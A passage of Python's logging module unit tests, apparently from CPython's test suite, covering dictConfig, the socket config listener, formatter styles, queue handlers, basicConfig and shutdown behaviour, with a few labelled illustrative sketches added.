logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
#Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
            # Nothing will be output since the handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
#Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
@unittest.skipUnless(threading, 'listen() needs threading to work')
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
t.join(2.0)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.apply_config(self.out_of_order)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
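# --- Illustrative sketch (not part of the original test suite) ---
# The dictionaries above lean on two indirection schemes resolved by
# logging.config: 'ext://' names an importable Python object (for example
# ext://sys.stdout), while 'cfg://' points back into the config dict itself
# (config11's 'cfg://handler_configs[hand1]').  A minimal runnable config
# using the ext:// form; the logger name 'sketch' is arbitrary.
def _dict_config_demo():
    logging.config.dictConfig({
        'version': 1,
        'disable_existing_loggers': False,
        'formatters': {'plain': {'format': '%(levelname)s ++ %(message)s'}},
        'handlers': {
            'console': {
                'class': 'logging.StreamHandler',
                'formatter': 'plain',
                'stream': 'ext://sys.stderr',
            },
        },
        'loggers': {'sketch': {'level': 'INFO', 'handlers': ['console']}},
    })
    logging.getLogger('sketch').info('configured via dictConfig')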
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
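# --- Illustrative sketch (not part of the original test suite) ---
# getChild() is just dotted-name composition: parent.getChild('x.y') returns
# the same object as logging.getLogger(parent.name + '.x.y'), which is what
# the identity assertions above check.
def _get_child_equivalence():
    parent = logging.getLogger('abc')
    return parent.getChild('def.ghi') is logging.getLogger('abc.def.ghi')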
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = support.TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = support.TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
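# --- Illustrative sketch (not part of the original test suite) ---
# Typical wiring mirrored by QueueHandlerTest: producers log through a
# QueueHandler while a QueueListener drains the shared queue on a background
# thread and forwards each record to the real handlers.
def _queue_logging_demo():
    import queue
    q = queue.Queue(-1)
    target = logging.StreamHandler()
    listener = logging.handlers.QueueListener(q, target)
    logger = logging.getLogger('queue-demo')
    logger.propagate = False
    logger.addHandler(logging.handlers.QueueHandler(q))
    listener.start()
    try:
        logger.warning('handled on the listener thread')
    finally:
        listener.stop()
        target.close()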
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime')
self.assertFalse(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='{')
self.assertFalse(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${asctime', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='$')
self.assertFalse(f.usesTime())
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
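# --- Illustrative sketch (not part of the original test suite) ---
# The three Formatter styles exercised above express the same layout with
# different placeholder syntaxes: '%' uses %(field)s, '{' uses str.format()
# fields, and '$' uses string.Template placeholders.  All three formatters
# below produce 'INFO hello' for the same record.
def _formatter_styles_demo():
    record = logging.makeLogRecord({'msg': 'hello', 'levelname': 'INFO'})
    styles = (
        logging.Formatter('%(levelname)s %(message)s'),
        logging.Formatter('{levelname} {message}', style='{'),
        logging.Formatter('$levelname $message', style='$'),
    )
    return [f.format(record) for f in styles]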
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
def test_logging_at_shutdown(self):
# Issue #20037
code = """if 1:
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()"""
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
if threading:
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.level = self.original_logging_level
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='foo')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, 'foo')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
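# --- Illustrative sketch (not part of the original test suite) ---
# basicConfig() only does anything while the root logger has no handlers,
# which is why the second call in test_level() above leaves the level at 57.
# The sketch saves and restores root state so it has no lasting effect.
def _basic_config_is_one_shot():
    import io
    root = logging.getLogger()
    saved_handlers, saved_level = root.handlers[:], root.level
    root.handlers = []
    try:
        logging.basicConfig(stream=io.StringIO(), level=logging.DEBUG)
        logging.basicConfig(level=logging.CRITICAL)   # ignored: already configured
        return root.level == logging.DEBUG
    finally:
        for h in root.handlers:
            h.close()
        root.handlers = saved_handlers
        root.level = saved_level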
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
